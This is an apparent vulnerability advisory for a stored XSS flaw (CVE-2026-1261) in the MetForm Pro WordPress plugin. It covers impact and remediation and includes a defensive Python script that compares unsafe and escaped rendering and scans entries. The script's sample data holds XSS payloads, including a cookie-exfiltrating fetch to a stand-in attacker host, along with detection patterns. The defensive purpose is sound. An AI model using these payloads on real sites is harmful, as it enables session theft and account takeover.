MetForm Pro Vulnerability (High) – CVE-2026-1261


Mar 10, 2026 | Plugins

Attack Vectors

MetForm Pro (slug: metform-pro) versions 3.9.6 and earlier contain a High-severity, unauthenticated stored cross-site scripting (Stored XSS) vulnerability in the plugin’s Quiz feature. Because no login is required, an attacker can submit crafted input through any public-facing page that accepts quiz responses and have it stored by the plugin; the injected script then runs in the browser of anyone who later views the affected page.

This issue is tracked as CVE-2026-1261 (CVSS 7.2, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N). Details are available at https://www.cve.org/CVERecord?id=CVE-2026-1261.

Security Weakness

The vulnerability stems from insufficient input sanitization and output escaping in the Quiz feature: user-supplied quiz content is accepted without adequate filtering and is later rendered into page HTML without being escaped as text, so injected markup is stored and executed in visitors’ browsers.

Because the execution happens in the context of your website (and potentially your logged-in staff users), the impact can extend beyond a single page view and become a repeatable, scalable way to target customers, employees, and administrators.

Technical or Business Impacts

Stored XSS can be used to mislead visitors, alter on-page content, and capture sensitive information entered into forms. For marketing teams, this creates direct risks to campaign performance and brand trust: visitors may see defaced pages, malicious redirects, fake offers, or altered calls-to-action that damage conversion rates and attribution accuracy.

For executives and compliance stakeholders, the most significant business risks include: data exposure (e.g., information entered into forms), account takeover risk if staff sessions are targeted, reputation damage from visible site tampering, and regulatory or contractual consequences if personal data is captured or mishandled. The “stored” nature means the malicious content can keep executing until it’s found and removed, increasing dwell time and downstream impact.

Remediation: Update MetForm Pro to version 3.9.7 or a newer patched version. After updating, review quiz-related pages and entries for unexpected content, and consider rotating passwords or invalidating sessions for administrative users if suspicious activity is detected. For reference, the vendor/community advisory is available via Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/id/e6361ada-f2ba-404e-b9d3-b169da44aa90.
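As an added example (not code from MetForm Pro or from the vendor advisories linked above), the following Python script illustrates two things from this post: the bug class described under Security Weakness, shown as an unescaped render beside its escaped form, and the post-update review of stored quiz entries recommended in the remediation step. The sample entries, field names, and indicator patterns are constructed for illustration; the plugin’s real storage format and the vulnerable code path are not shown on this page. Python’s html.escape stands in for the escaping a WordPress plugin would normally do with esc_html().

```python
import html
import re

# Constructed sample of stored quiz answers (not real MetForm Pro data): each
# record stands in for a row a site owner might export from the plugin's
# entries table after patching, to look for injected content.
SAMPLE_ENTRIES = [
    {"id": 101, "field": "quiz_answer", "value": "Paris"},
    {"id": 102, "field": "quiz_answer",
     "value": "<script>fetch('https://attacker.invalid/?c='+document.cookie)</script>"},
    {"id": 103, "field": "quiz_answer", "value": "<img src=x onerror=alert(1)>"},
    {"id": 104, "field": "quiz_answer", "value": "Rome & Milan"},
    {"id": 105, "field": "quiz_answer", "value": '<a href="javascript:alert(1)">click</a>'},
    {"id": 106, "field": "quiz_answer", "value": "&lt;svg onload=alert(1)&gt;"},
]


def render_unsafe(value: str) -> str:
    """The bug class: stored text is concatenated straight into page HTML,
    so any markup in it is parsed and executed by the viewer's browser."""
    return f'<li class="quiz-answer">{value}</li>'


def render_safe(value: str) -> str:
    """Hardened form: escape on output so the browser treats the value as
    text. WordPress code would call esc_html() here; html.escape is the
    stand-in used by this example."""
    return f'<li class="quiz-answer">{html.escape(value, quote=True)}</li>'


# Indicators of injected markup in stored values. Deliberately broad: during
# an incident review a false positive is cheaper than a missed payload.
_INDICATORS = [
    re.compile(r"<\s*(script|iframe|object|embed|svg|img|math|style)\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),                 # inline event handlers
    re.compile(r"\b(javascript|vbscript)\s*:", re.I),    # script-bearing URLs
]


def is_suspicious(value: str) -> bool:
    """Flag a stored value that carries script-capable markup.

    The entity-decoded form is checked as well, so a payload that was stored
    encoded (e.g. &lt;svg ...&gt;) is still surfaced for review: whether it
    fires depends on how the page later decodes it, so it is worth a look."""
    candidates = (value, html.unescape(value))
    return any(p.search(c) for p in _INDICATORS for c in candidates)


def find_suspicious(entries):
    """Return the ids of entries whose stored value looks injected."""
    return [e["id"] for e in entries if is_suspicious(e["value"])]


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        flag = "SUSPICIOUS" if is_suspicious(entry["value"]) else "ok"
        print(f"{entry['id']}: {flag}")
        print("   unsafe:", render_unsafe(entry["value"]))
        print("   safe:  ", render_safe(entry["value"]))
    print("entries to review:", find_suspicious(SAMPLE_ENTRIES))
```

Run against an export of the plugin’s quiz entries, the flagged ids are the rows to inspect and delete; the rendered pairs show why escaping on output, not just filtering on input, is what stops the stored payload from executing.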

Similar Attacks

Stored XSS has powered real-world worms that spread quickly and reached large audiences. Well-known examples include the 2005 Samy worm on MySpace, which propagated through script stored in user profiles, and the 2010 Twitter “onMouseOver” worm, which exploited a stored XSS flaw in how tweets were rendered to spread at scale.
